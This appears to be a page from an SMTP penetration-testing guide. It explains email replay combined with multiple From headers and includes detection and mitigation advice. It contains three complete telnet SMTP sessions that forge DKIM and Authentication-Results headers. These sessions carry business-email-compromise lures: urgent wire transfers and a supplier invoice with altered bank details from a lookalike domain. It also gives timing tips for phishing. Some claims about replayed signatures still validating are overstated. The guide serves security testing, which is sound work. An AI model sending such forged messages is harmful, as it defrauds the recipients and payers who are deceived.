SMTP Pentest Guide
Back to Email Authentication Attacks

Replay & Multiple From

This attack combines email replay techniques with multiple From headers to create sophisticated spoofing attacks that can bypass authentication mechanisms and appear legitimate to recipients.

Attack Summary: Combining email replay techniques with multiple From headers to bypass authentication and create convincing spoofed emails.

Background: Email Replay and Multiple From

This attack combines two techniques we've discussed separately:

  • Email Replay: Capturing and resending legitimate emails with modifications
  • Multiple From Headers: Exploiting inconsistent handling of multiple From headers

By combining these techniques, attackers can create sophisticated spoofing attacks that are difficult to detect and can bypass multiple layers of email security.

Attack Methodology

This attack involves capturing legitimate emails, modifying them to include multiple From headers, and resending them to create convincing spoofed emails.

Basic Replay with Multiple From
Combining replay with multiple From headers

This variant involves capturing a legitimate email, adding multiple From headers, and resending it.

Replay with Multiple From Example

Replaying an email with multiple From headers

# Capture a legitimate email with valid authentication # Modify it to include multiple From headers # Resend it through a different server telnet mail.attacker.com 25 HELO attacker.com MAIL FROM: original-sender@legitimate.com RCPT TO: victim@target.com DATA Received: from mail.legitimate.com (mail.legitimate.com [192.0.2.1]) by mail.recipient.com (Postfix) with ESMTPS for recipient@example.com; Mon, 20 Feb 2023 12:00:00 +0000 DKIM-Signature: v=1; a=rsa-sha256; d=legitimate.com; s=selector; ... From: ceo@company.com From: attacker@malicious.com To: victim@target.com Subject: Urgent Wire Transfer Please process this wire transfer immediately. .
Explanation: In this example, the attacker captures a legitimate email from legitimate.com that has valid DKIM signatures. The attacker adds a second From header and resends the email through their own server. Some email clients will display the first From header (ceo@company.com), while others will display the second From header (attacker@malicious.com). The DKIM signature may still validate because it only covers the first From header.

How It Works

  1. Attacker captures a legitimate email with valid authentication
  2. Attacker adds a second From header to the email
  3. Attacker resends the modified email through a different server
  4. The DKIM signature may still validate if it only covers the first From header
  5. Different email clients display different From headers
  6. Recipients may see the email as coming from the legitimate sender
  7. The email appears to have passed authentication checks
Selective Header Replay
Replaying only specific headers

This variant involves selectively replaying only specific headers from a legitimate email.

Selective Header Replay Example

Replaying only authentication headers

# Capture a legitimate email with valid authentication # Extract only the authentication headers # Combine them with a new email body and multiple From headers # Resend it through a different server telnet mail.attacker.com 25 HELO attacker.com MAIL FROM: original-sender@legitimate.com RCPT TO: victim@target.com DATA Received: from mail.legitimate.com (mail.legitimate.com [192.0.2.1]) by mail.recipient.com (Postfix) with ESMTPS for recipient@example.com; Mon, 20 Feb 2023 12:00:00 +0000 DKIM-Signature: v=1; a=rsa-sha256; d=legitimate.com; s=selector; ... Authentication-Results: mail.recipient.com; spf=pass; dkim=pass From: ceo@company.com From: finance@company.com To: victim@target.com Subject: Updated Wire Transfer Instructions Please use the following new wire transfer instructions... .
Explanation: In this example, the attacker captures a legitimate email and extracts only the authentication headers (Received, DKIM-Signature, Authentication-Results). The attacker combines these headers with a new email body and multiple From headers, then resends the email. The authentication headers make it appear that the email has passed all authentication checks, while the multiple From headers exploit inconsistent client behavior.

Authentication Header Replay

Attackers can replay various authentication headers:

  • DKIM-Signature: Makes it appear that the email was signed by the legitimate domain
  • Authentication-Results: Makes it appear that the email passed authentication checks
  • Received: Makes it appear that the email passed through legitimate servers
  • ARC-Authentication-Results: Makes it appear that the email passed authentication at previous hops
  • SPF-Results: Makes it appear that the email passed SPF checks
Time-Delayed Replay
Replaying emails after a time delay

This variant involves capturing legitimate emails and replaying them after a time delay with modifications.

Time-Delayed Replay Example

Replaying emails after a delay

# Capture a legitimate email with valid authentication # Wait for a specific time or event # Modify it to include multiple From headers and updated content # Resend it through a different server # Example: Capturing a monthly invoice email and replaying it with modified bank details telnet mail.attacker.com 25 HELO attacker.com MAIL FROM: accounting@supplier.com RCPT TO: victim@customer.com DATA Received: from mail.supplier.com (mail.supplier.com [192.0.2.1]) by mail.customer.com (Postfix) with ESMTPS for victim@customer.com; Mon, 20 Feb 2023 12:00:00 +0000 DKIM-Signature: v=1; a=rsa-sha256; d=supplier.com; s=selector; ... From: accounting@supplier.com From: accounting@supp1ier.com To: victim@customer.com Subject: Monthly Invoice - March 2023 Please process the attached invoice using the updated bank details below... .
Explanation: In this example, the attacker captures a legitimate monthly invoice email from a supplier. The attacker waits until the next invoice is expected, then modifies the email to include multiple From headers (one legitimate, one with a lookalike domain) and updated bank details. The attacker resends the email just before the legitimate invoice is expected. The timing makes the attack more convincing, and the multiple From headers exploit inconsistent client behavior.

Timing-Based Attacks

Attackers can use timing to make replay attacks more effective:

  • Expected communications: Replaying emails when similar legitimate emails are expected
  • Business events: Timing attacks around known business events (e.g., end of quarter)
  • Out-of-office periods: Targeting recipients when key personnel are away
  • High-volume periods: Replaying during times when recipients receive many emails
  • After-hours: Replaying emails outside normal business hours when scrutiny may be lower

Impact

This attack allows attackers to:

  • Create highly convincing spoofed emails that appear to have passed authentication
  • Exploit inconsistent client behavior to control how emails are displayed
  • Bypass multiple layers of email security
  • Conduct sophisticated phishing or business email compromise attacks
  • Target specific recipients with customized attacks

Detection

Organizations can detect these attacks by:

  • Implementing email security solutions that check for multiple From headers
  • Using solutions that validate the entire email, not just specific headers
  • Monitoring for unusual patterns in email headers
  • Checking for inconsistencies between authentication headers and email content
  • Implementing time-based checks for duplicate or similar emails

Mitigation

To protect against these attacks, organizations should:

  • Reject multiple headers: Configure email servers to reject messages with multiple From headers
  • Implement DMARC: Use strict DMARC policies to prevent spoofing
  • Use email authentication: Implement SPF, DKIM, and DMARC for all domains
  • Validate authentication: Use email security solutions that validate the entire email
  • Train users: Educate users about the risks of email spoofing and phishing
  • Implement additional verification: Use out-of-band verification for sensitive requests
  • Monitor for anomalies: Implement monitoring for unusual email patterns

Testing

Security professionals can test for this vulnerability using the following approach:

  1. Capture legitimate emails with valid authentication
  2. Modify them to include multiple From headers
  3. Resend them through different servers
  4. Check if email clients display different From headers
  5. Check if email security solutions detect the modifications
  6. Document inconsistencies in how different systems handle the emails

References

  • RFC 5322: "Internet Message Format." https://tools.ietf.org/html/rfc5322
  • RFC 7489: "Domain-based Message Authentication, Reporting, and Conformance (DMARC)." https://tools.ietf.org/html/rfc7489
  • Chen, J., Duan, H., Weaver, N., Paxson, V., & Jiang, J. (2021). "Measuring and Mitigating Email Sender Spoofing Attacks." In Proceedings of the 30th USENIX Security Symposium.
  • Foster, I. D., Larson, J., Masich, M., Snoeren, A. C., Savage, S., & Levchenko, K. (2015). "Security by Any Other Name: On the Effectiveness of Provider Based Email Security." In Proceedings of the 22nd ACM SIGSAC Conference on Computer and Communications Security.
Previous: Service Account SpoofingBack to Email Authentication Attacks